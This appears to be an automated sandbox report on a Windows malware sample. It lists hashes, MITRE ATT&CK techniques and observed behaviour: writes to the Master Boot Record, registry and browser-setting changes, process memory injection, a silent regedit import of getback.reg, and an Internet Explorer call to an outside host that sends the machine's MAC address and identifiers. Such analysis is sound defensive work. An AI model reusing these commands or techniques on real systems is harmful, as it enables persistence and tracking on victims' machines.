cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426

General

Target

cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe
Size

16KB
MD5

59d6ad851d8331958d24e884785ab03d
SHA1

83c91010843b1d6b483caf07ec026fbf07e1ab50
SHA256

cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426
SHA512

91d2d0aefe94a8b1ee4ca4099e47e2439b0321bc58ee266024c4324d8e72dd0aa70224425c64f85ec80c1aedc852fdc8e43fda8088a9cd84e0a435bb95611056
SSDEEP

384:EISV9Jl+eAykm/iXYK7SGbbfv9ngnNP+aZnZzudhfa+H2:Knb4mfLmJK+anZ8hfx2

Score

6^/10

bootkit persistence

Malware Config

Signatures

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{94D5A72F-7944-11ED-AECB-D2A4FF929712} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\BrowserFlags = "16"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec\ = "[]"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ExplorerFlags = "18"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic\ = "AppProperties"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application\ = "Folders"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\NoActivateHandler	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command\ = "%SystemRoot%\\Explorer.exe /idlist,%I,%L"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ = "[ViewFolder(\"%l\", %I, %S)]"	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
5020	regedit.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe
880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4984	iexplore.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe
4984	iexplore.exe
4984	iexplore.exe
3668	IEXPLORE.EXE
3668	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 880 wrote to memory of 3172	880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe	79
PID 880 wrote to memory of 3172	880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe	79
PID 880 wrote to memory of 3172	880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe	79
PID 880 wrote to memory of 4984	880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe	82
PID 880 wrote to memory of 4984	880	cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe	82
PID 3172 wrote to memory of 5020	3172	cmd.exe	81
PID 3172 wrote to memory of 5020	3172	cmd.exe	81
PID 3172 wrote to memory of 5020	3172	cmd.exe	81
PID 4984 wrote to memory of 3668	4984	iexplore.exe	83
PID 4984 wrote to memory of 3668	4984	iexplore.exe	83
PID 4984 wrote to memory of 3668	4984	iexplore.exe	83

C:\Users\Admin\AppData\Local\Temp\cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe
"C:\Users\Admin\AppData\Local\Temp\cefb7c960cb89e7c4e8eec93e73aa35c6dbb62cf612a220c4a35d5ae97306426.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3172
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
    3⤵
    - Modifies registry class
    - Runs .reg file with regedit
    PID:5020
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www.38078.comget.asp?mac=D2A4FF929712&makedate=QM00013&comput=Home&ver=81&userid=0
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4984 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

1

T1067

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\getback.reg

Filesize
1KB

MD5
626e2d76f5c328d57a3eff6a7f94d129

SHA1
210fd33fa005775b30a8fd40a065a2e788934216

SHA256
5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

SHA512
629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

Download Submit
memory/880-132-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/880-138-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3172-135-0x0000000000000000-mapping.dmp

Download
memory/5020-136-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing